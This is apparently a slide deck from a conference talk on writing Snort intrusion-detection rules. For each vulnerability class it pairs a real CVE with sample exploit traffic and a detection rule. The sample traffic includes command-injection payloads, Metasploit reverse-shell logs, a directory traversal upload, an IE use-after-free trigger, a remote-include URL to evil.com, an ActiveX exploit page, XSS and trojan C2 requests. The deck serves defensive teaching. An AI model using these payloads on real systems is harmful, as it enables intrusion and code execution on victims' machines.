Embed Size (px)
Citation preview
Introduction to Snort
Rule Writing
Snort Rule Syntax
# rule headeralert tcp any any -> 192.168.1.0/24 111 (
rule action
protocol
src address
src port
dst address
dst port
Snort Rule Syntax
# rule option formatalert tcp any any -> 192.168.1.0/24 111 (
msg:"Rule Message"; \
rule option
rule option argument
rule option: content
# content match examplealert tcp any any -> 192.168.1.0/24 111 (
content:"ABCD"; \# is equivalent to:
content:"|41 42 43 44|"; \
The content match finds a static pattern in network data.
content modifiers: nocase
# content match modifiers: nocasealert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" or "abcd" etc.content:"ABCD"; nocase;
nocase makes a content match case insensitive.content matches are case sensitive by default.
content modifiers: offset
# content match modifiers: offsetalert tcp any any -> 192.168.1.0/24 111 (
# skip 2 bytes before searching for "ABCD"content:"ABCD"; offset:2;
offset requires the match to occur after the designated offset in network data.
content modifiers: depth
# content match modifiers: depthalert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" within the first 4 bytes of the payloadcontent:"ABCD"; depth:4;
depth restricts how far Snort should search for the specified pattern.
content modifiers: distance
# content match modifiers: distancealert tcp any any -> 192.168.1.0/24 111 (
# find "DEF" 1 byte after "ABC"content:"ABC"; content:"DEF"; distance:1;
distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern relative to the end of the previous pattern match.
content modifiers: within
# content match modifiers: withinalert tcp any any -> 192.168.1.0/24 111 (
# find "EFG" within 10 bytes of "ABC"content:"ABC"; content:"EFG"; within:10;
within makes sure that at most N bytes are between pattern matches.
negated content match
# negated content matchalert tcp any any -> 192.168.1.0/24 111 (
# make sure "EFG" is NOT within 10 bytes of "ABC"content:"ABC"; content:!"EFG"; within:10;
content matches can be negated.
content buffers
# content buffer examplealert tcp any any -> 192.168.1.0/24 111 (
# match "ABC" within the HTTP URIcontent:"ABC"; http_uri;
content matches can be restricted to a payload location, such as the HTTP URI.
content buffers
POST /index.php HTTP/1.1Host: example.comContent-Length: 28Content-Type: application/x-www-form-urlencodedCookie: this_is_a_cookie=this_is_its_value
firstparam=one&secondparam=two
Buffers: http_method http_uri http_header http_cookiehttp_client_body
content modifiers: fast_pattern
# fast_pattern examplealert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_patterncontent:"ABC"; fast_pattern;
fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher. The fast_pattern serves as the “entrance” condition for rule evaluation.
content modifiers: fast_pattern
# fast_pattern:only; examplealert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_patterncontent:"ABC"; fast_pattern:only;
fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule “enters”.
rule option: pcre
# pcre rule option examplealert tcp any any -> 192.168.1.0/24 111 (
# match the following regexpcre:"/A[BC]D/i"; \
pcre declares a Perl compatible regular expression for matching on payload data.Flags can be specified after the slash.e.g. /i for case insensitivity.
Traffic Triage and Isolation
Normal Trafficfast_pattern
content, etc. Vulnerable Application Traffic
Slow
Fast
pcre
content, etc. Vulnerable Parameter TrafficVulnerability Condition
Vulnerability Condition
Traffic VolumeSpeed Traffic Type
Detection Strategies
Detection Topics
> Buffer OverflowCommand InjectionDirectory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Buffer Overflow Overview
Stack buffer overflow in AVM Fritz!Box daemon
dsl_control.
AVM Fritz!Box firmware fails to check the length of user
supplied data in a 'se' or ScriptExecute command sent in a
SOAP request to the dsl_control daemon.
Buffer Overflow Overview
dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function:
[...]DSL_CPE_CLI_CMD_ADD_COMM (
"se","ScriptExecute",DSL_CPE_CLI_ScriptExecute,g_sSe);
[...]
Buffer Overflow Overview
DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...]) {[...]DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};
if(DSL_CPE_CLI_CheckParamNumber(pCommands,1,DSL_CLI_EQUALS) == DSL_FALSE)
{return -1;
}
DSL_CPE_sscanf(pCommands, "%s", sFileName);
[...]
Buffer Overflow Overview
The code calls the function DSL_CPE_sscanf in order to
copy the value of the parameter pCommands to the local
character array sFileName without restricton or bounds
checking. The size of the vulnerable stack buffer is 256
bytes as indicated in dsl_cpi_cli_console.h:
#define DSL_MAX_COMMAND_LINE_LENGTH 256
Triggering the vulnerability is then a simple matter of
sending >256 bytes in the first 'se' parameter.
Buffer Overflow Exploit
<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelopexmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/";xmlns:ifx="urn:dsl_api"><SOAP-ENV:Body><ifx:DslCpeCliAccess><command>se "A"*300</command></ifx:DslCpeCliAccess></SOAP-ENV:Body></SOAP-ENV:Envelope>
Buffer Overflow Detection
# vulnerable SOAP request# with at least 256 bytes# within <command></command>#content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; \content:"<command"; nocase; http_client_body; \isdataat:256,relative; \content:!"</command"; nocase; within:256; http_client_body; \
# stack buffer overflow (>256 bytes)# within param0: <command> se param0 </command>#pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi"; \
Buffer Overflow Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( \msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; \flow:to_server,established; \content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; \content:"<command"; nocase; http_client_body; \isdataat:256,relative; \content:!"</command"; within:256; nocase; http_client_body; \pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi"; \metadata:policy security-ips drop, service http; \classtype:attempted-admin; \
)
Detection Topics
> Buffer OverflowCommand InjectionDirectory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Detection Topics
Buffer Overflow> Command Injection
Directory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Command Injection Overview
CVE-2014-3805
Command injection vulnerabilities in AlienVault OSSIM av-
centerd, which accepts SOAP commands on port 40007.
SOAP command 'get_log_line' parameter '$number_lines'
and 'get_license' parameter '$license_type' are used in OS
commands without sanitization.
Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_log_line() {my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $r_file, $number_lines ) = @_;[...]# $number_lines used in OS command without sanitizationmy $command = "tail -$number_lines $r_file";my @content = `$command`;[...]}
Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_license() {my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $license, $license_type ) = @_;[...]# $license_type used in OS command without sanitizationmy $package = system ("curl --proxy-anyauth -K /etc/curlrc
http://[...]/avl/$license_type/[...]");}
Command Injection Exploit
POST /av-centerd HTTP/1.1Host: 172.16.8.223:40007User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Content-Length: 765Content-Type: text/xml; charset=utf-8SOAPAction: "AV/CC/Util#get_log_line"
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&& perl -MMIME::Base64 -e 'system(decode_base64("cGVy[...]</c-gensym13></get_log_line></soap:Body></soap:Envelope>
Command Injection Exploit
POST /av-centerd HTTP/1.1Host: 172.16.8.223:40007User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Content-Length: 765Content-Type: text/xml; charset=utf-8SOAPAction: "AV/CC/Util#get_log_line"
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&& perl -MMIME::Base64 -e 'system(decode_base64("cGVy[...]</c-gensym13></get_log_line></soap:Body></soap:Envelope>
Command Injection Exploit
msf exploit(alienvault_centerd_soap_exec) > exploit
[*] Started reverse handler on 172.16.158.1:4444[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
iduid=0(root) gid=0(root) groups=0(root)
remember traffic isolation...
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (\msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; \flow:to_server,established; \content:"/av-centerd"; nocase; http_uri; \content:"<get_log_line"; fast_pattern; nocase; http_client_body; \content:"xsd:string"; distance:0; nocase; http_client_body; \pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi"; \metadata:service http; \reference:cve,2014-3805; \classtype:attempted-admin; \
)
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (\msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; \flow:to_server,established; \content:"/av-centerd"; nocase; http_uri; \content:"<get_license"; fast_pattern; nocase; http_client_body; \content:"xsd:string"; distance:0; nocase; http_client_body; \pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi"; \metadata:service http; \reference:cve,2014-3805; \classtype:attempted-admin; \
)
Command Injection Overview
CVE-2014-5073
OS command injection vulnerability in VMTurbo
Operations Manager vmtadmin.cgi parameter 'fileDate'.
If the 'callType' parameter is set to "DOWN" vmtadmin.cgi
will pass the value of 'fileDate' to system().
Command Injection Overview
my $actiontype = $query->param("actionType");my $calltype = $query->param("callType");my $filedate = $query->param("fileDate");my $statusfile = (defined $filedate) ? $filedate : $mon.".".$mday." [...][...]elseif ($calltype eq "DOWN") {[...]
system("rm \"$upload_dir$statusfile\"");[...]
Command Injection Exploit
GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=%22%60printf%20%27\177\105\114[...] HTTP/1.1Host: 172.16.41.140User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Content-Type: application/x-www-form-urlencodedContent-Length: 0
Command Injection Exploit
GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate=%22%60printf%20%27\177\105\114[...] HTTP/1.1Host: 172.16.41.140User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Content-Type: application/x-www-form-urlencodedContent-Length: 0
Command Injection Exploit
msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit
[*] Started reverse handler on 172.16.158.1:4444[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
iduid=0(root) gid=0(root) groups=0(root)
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; \flow:to_server,established; \
metadata:policy security-ips drop, service http; \reference:cve,2014-5073; \classtype:attempted-admin; \
)
content:"callType=DOWN"; nocase; http_uri; \
content:"fileDate="; nocase; http_uri; \
pcre:"/[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)/Ui"; \Start by isolating traffic.
content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; \
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; \flow:to_server,established; \content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; \content:"callType=DOWN"; nocase; http_uri; \content:"fileDate="; nocase; http_raw_uri; \content:"%26"; distance:0; http_raw_uri; \pcre:"/[?&]fileDate=[^&]*?%26/Ii"; \metadata:policy security-ips drop, service http; \reference:cve,2014-5073; \classtype:attempted-admin; \
)
Detection Topics
Buffer Overflow> Command Injection
Directory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Detection Topics
Buffer OverflowCommand Injection
> Directory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Directory Traversal Overview
CVE-2014-2424
Directory traversal vulnerability in Oracle Event
processing. FileUploadServlet function
processUploadedFile() fails to properly sanitize the
filename parameter value.
The WMI service can be abused to convert the file upload
into remote code execution without user interaction.
Directory Traversal Overview
private void processUploadedFile(FileItem paramFileItem){
try {// paramFileItem.getName() used to// create file without verificationparamFileItem.write(new File(this.uploadLocation,
paramFileItem.getName()));
} catch (Exception localException) { [...] }}
Directory Traversal Exploit
POST /wlevs/visualizer/upload HTTP/1.1Host: 172.16.8.29:9002User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828Content-Length: 2658
--_Part_732_2993821416_1334322828Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof"Content-Type: application/octet-streamContent-Transfer-Encoding: binary
#pragma namespace("\\\\.\\root\\cimv2") [...]
Directory Traversal Exploit
POST /wlevs/visualizer/upload HTTP/1.1Host: 172.16.8.29:9002User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828Content-Length: 2658
--_Part_732_2993821416_1334322828Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof"Content-Type: application/octet-streamContent-Transfer-Encoding: binary
#pragma namespace("\\\\.\\root\\cimv2") [...]
Directory Traversal Exploit
msf exploit(oracle_event_processing_upload) > rexploit[*] Reloading module...
[*] Started reverse handler on 172.16.158.1:4444[*] 172.16.158.198:9002 - Generating payload and mof file...[*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe...[*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof[*] Sending stage (769536 bytes) to 172.16.158.198[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at 2014-06-29 15:42:37 -0500[+] Deleted wbem/mof/klIvousnq.mof[!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target
meterpreter > getuidServer username: NT AUTHORITY\SYSTEM
Directory Traversal Detection
## Multipart POST#content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; \content:"filename"; nocase; http_client_body; \content:"Content-Disposition"; nocase; http_client_body; \pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi"; \
## Urlencoded POST#content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; \content:"filename="; nocase; http_client_body; \pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim"; \
Directory Traversal Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; \flow:to_server,established; \content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; \content:"filename"; nocase; http_client_body; \content:"Content-Disposition"; nocase; http_client_body; \pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi"; \metadata:policy balanced-ips drop, policy security-ips drop, service http; \reference:cve,2014-2424; \classtype:attempted-admin; \
)
Directory Traversal Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; \flow:to_server,established; \content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; \content:"filename="; nocase; http_client_body; \pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim"; \metadata:policy balanced-ips drop, policy security-ips drop, service http; \reference:cve,2014-2424; \classtype:attempted-admin; \
)
Detection Topics
Buffer OverflowCommand Injection
> Directory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Detection Topics
Buffer OverflowCommand InjectionDirectory Traversal
> Use-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Use-After-Free Overview
CVE-2013-3893This vulnerability is triggered by Javascript that sets an onlosecapture()
handler on the parent of two elements. This handler clears the DOM with
document.write() when it is called. The Javascript then calls setCapture() on
the parent and the child element. This triggers the onlosecapture() handler,
freeing a reference with document.write(). After the free, the invalid
reference will remain causing a crash (or code execution) in
MSHTML!CTreeNode::GetInterface.
Use-After-Free Trigger
function trigger(){
var id_0 = document.createElement("sup");var id_1 = document.createElement("audio");document.body.appendChild(id_0);document.body.appendChild(id_1);id_1.applyElement(id_0);id_0.onlosecapture=function(e) {
document.write("");}
id_0.setCapture();id_1.setCapture();
}
Use-After-Free Trigger
0:005> reax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246MSHTML!CTreeNode::GetInterface+0xd8:679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????
Use-After-Free Detection
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any ( \msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; \flow:to_client,established; \file_data; \content:".applyElement"; nocase; \content:".onlosecapture"; nocase; within:500; fast_pattern; \content:".setCapture"; nocase; within:500; \content:".setCapture"; nocase; within:500; \pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si"; \metadata:service ftp-data, service http, service imap, service pop3; \reference:cve,2013-3893; \
)
Use-After-Free Detection
alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 ( \msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; \flow:to_server,established; \file_data; \content:".applyElement"; nocase; \content:".onlosecapture"; nocase; within:500; fast_pattern; \content:".setCapture"; nocase; within:500; \content:".setCapture"; nocase; within:500; \pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si"; \metadata:service smtp; \reference:cve,2013-3893; \
)
Detection Topics
Buffer OverflowCommand InjectionDirectory Traversal
> Use-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Detection Topics
Buffer OverflowCommand InjectionDirectory TraversalUse-After-Free
> Remote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Remote File Include Overview
CVE-2008-5053
Remote file include vulnerability in Joomla Simple RSS Reader allows execution of
arbitrary PHP code via the parameter mosConfig_live_site in
administrator/components/com_rssreader/admin.rssreader.php:
include("$mosConfig_live_site/components/com_rssreader/about.html");
$mosConfig_live_site is obtained from the GET parameter of the same name sent to
admin.rssreader.php.
Exploit:
http://site/joomlapath/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://evil.com/
Remote File Include Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt"; \flow:to_server,established; \content:"admin.rssreader.php"; fast_pattern:only; http_uri; \content:"mosConfig_live_site="; nocase; http_uri; \pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui"; \metadata:service http; \reference:cve,2008-5053; \classtype:web-application-attack; \
)
Detection Topics
Buffer OverflowCommand InjectionDirectory TraversalUse-After-Free
> Remote File IncludeBrowser PluginsCross Site Scripting
Malware Command Traffic
Detection Topics
Buffer OverflowCommand InjectionDirectory TraversalUse-After-FreeRemote File Include
> Browser PluginsCross Site Scripting
Malware Command Traffic
Browser Plugin Overview
CVE-2012-2516
GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help
functionality for the Proficy enterprise data collection system. It can be
instantiated in a web page using the <object> tag, for example:
<object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681">
Or using Javascript:
obj = new ActiveXObject("KeyHelp.KeyScript")
Browser Plugin Overview
The API of this ActiveX object exposes several methods including
LaunchTriPane(), which has the following prototype:
Void LaunchTriPane(System.string ChmFile)
The function LaunchTriPane will use ShellExecute to launch hh.exe, with user
controlled data as parameters:
> HH.EXE -decompile D:/destination-folder C:/test.chm
This can be abused to write arbitrary files. Code execution is possible by
uploading a WMI .mof file.
Browser Plugin Disassembly
KeyHelp.ocx:
5D335165 CALL KeyHelp.5D31797F5D33516A JMP SHORT KeyHelp.5D33517D 5D33516C PUSH 5 5D33516E PUSH EDI 5D33516F PUSH ESI ; Malicious command line parameters - no validation5D335170 PUSH KeyHelp.5D347950 ; ASCII "hh.exe" 5D335175 PUSH EDI 5D335176 PUSH EDI 5D335177 CALL SHELL32.ShellExecuteA ; run hh.exe with malicious params5D33517D CMP ESI,EDI 5D33517F JE SHORT KeyHelp.5D335187 5D335181 PUSH ESI
Browser Plugin Exploit
<html><body><script>KeyScript = new ActiveXObject("KeyHelp.KeyScript");
ChmPayloadFile = "-decompile C:\\WINDOWS\\system32\\ "+"\\\\172.16.211.1\\1A5vTb1QLAqfif\\DoixwWS.chm";
ChmMofFile = "-decompile c:\\WINDOWS\\system32\\wbem\\mof\\ "+"\\\\172.16.211.1\\1A5vTb1QLAqfif\\QLQklKr.chm";
KeyScript.LaunchTriPane(ChmPayloadFile);setTimeout('KeyScript.LaunchTriPane(ChmMofFile);',3000);</script></body></html>
Browser Plugin Detection
## <OBJECT> Detection#alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; \flow:to_client,established; \file_data; \content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only; \content:"LaunchTriPane"; nocase; \metadata:policy security-ips drop, service http; \reference:cve,2012-2516; \classtype:attempted-user; \
)
Browser Plugin Detection
## Javascript Detection#alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; \flow:to_client,established; \file_data; \content:"KeyHelp.KeyScript"; fast_pattern:only; \content:"LaunchTriPane"; nocase; \metadata:policy security-ips drop, service http; \reference:cve,2012-2516; \classtype:attempted-user; \
)
Detection Topics
Buffer OverflowCommand InjectionDirectory TraversalUse-After-FreeRemote File Include
> Browser PluginsCross Site Scripting
Malware Command Traffic
Detection Topics
Buffer OverflowCommand InjectionDirectory TraversalUse-After-FreeRemote File IncludeBrowser Plugins
> Cross Site ScriptingMalware Command Traffic
Cross Site Scripting (XSS) Overview
OSVDB-89893
Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient
sanitization of ‘width’ and ‘height’ parameters sent to the URI:
/includes/components/alertcloud/index.php
Exploit:
/nagiosxi/includes/components/alertcloud/index.php?height=4"}}; alert('XSS'); var aa={"A":{"B":"
Cross Site Scripting (XSS) Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( \msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt"; \flow:to_server,established; \content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri; \pcre:"/[?&](height|width)=[^&]*?([\x22\x27\x3c\x3e\x28\x29]|script|onload|src)/Ui"; \metadata:service http; \reference:url,osvdb.org/show/osvdb/89893; \classtype:web-application-attack; \
)
Detection Topics
Buffer OverflowCommand InjectionDirectory TraversalUse-After-FreeRemote File IncludeBrowser Plugins
> Cross Site ScriptingMalware Command Traffic
Detection Topics
Buffer OverflowCommand InjectionDirectory TraversalUse-After-FreeRemote File IncludeBrowser PluginsCross Site Scripting
> Malware Command Traffic
Malware Sample Overview
Win.Trojan.Sefnit
Upon execution Win.Trojan.Sefnit drops a service to %AppData%\Updater\updater.dll and starts it.
When the service updater.dll starts it attempts to read tasks from the configuration file
%AppData%\Updater/~conf.dat
Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and
appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the
encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in
the initial request to C2:
GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1
Host: axnlze.net
Accept: */*
The URI above has the following hardcoded format:
hxxp://<c2domain>/j/<uuid>/<version>
Malware Sample Disassembly
10015B27 PUSH 10112E28 ; /Arg1 = UNICODE ;"c2.net/j/<uuid>/<version>"10015B2C LEA ECX,DWORD PTR SS:[EBP-4C] ; |10015B2F CALL <_wcslen-copystr> ; \updater.10001BA410015B34 MOV BYTE PTR SS:[EBP-4],110015B38 MOV EDI,10112E14 ; UNICODE "<uuid>"10015B3D PUSH EDI ; /Arg1 => 10112E1410015B3E CALL <_wcslen> ; \updater.100196E1...10015BBB PUSH ESI ; UNICODE "<version>"10015BBC LEA ECX,DWORD PTR SS:[EBP-4C] 10015BBF CALL <substr_loc>10015BC4 MOV DWORD PTR SS:[EBP-1DC],EAX10015BCA PUSH ESI ; UNICODE "<version>"10015BCB CALL <_wcslen>10015BD0 MOV DWORD PTR SS:[EBP-1EC],EAX10015BD6 MOV EDI,10112E08 ; UNICODE "0001"...1005A043 PUSH 0 ; /Arg4 = 000000001005A045 PUSH ECX ; |Arg3 = 008DAA60 ASCII ; "/j/20a0b8237d5b084e46bd673e26d948bf/0001"1005A046 PUSH EBX ; |Arg2 = 1011B340 ASCII "GET"1005A047 PUSH EDI ; |Arg1 008C9138 = NULL1005A048 CALL 10058E00 ; \updater.10058E00
Malware Command Traffic Detection
## C2 request detection# # hardcoded urilenurilen:40,norm; \
# hardcoded uri pattern, begins with "/j/"content:"/j/"; depth:3; http_uri; \
# ends with "/0001"content:"/0001"; distance:32; within:5; http_uri; \
# no User-Agent in C2 requestcontent:!"User-Agent"; http_header; \
# final verification of C2 URI patternpcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U"; \
Malware Command Traffic Detection
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ( \msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt";
\flow:to_server,established; \urilen:40,norm; \content:"/j/"; depth:3; http_uri; \content:"/0001"; within:5; distance:32; http_uri; \content:!"User-Agent"; http_header; \pcre:"/^\x2fj\x2f[a-f0-9]{32}\x2f0001$/U"; \metadata:impact_flag red, service http; \classtype:trojan-activity; \
)
Call to Action
• Related sessions:• Introduction to Snort Rule Writing• Detection Strategies with Snort [DevNet-1126]
• Visit the World of Solutions for
• Cisco Campus
• Walk in Labs
• Technical Solution Clinics
• Meet the Engineer - Available immediately after this talk.
Brandon Stultz
talosintel.com
@talossecurity
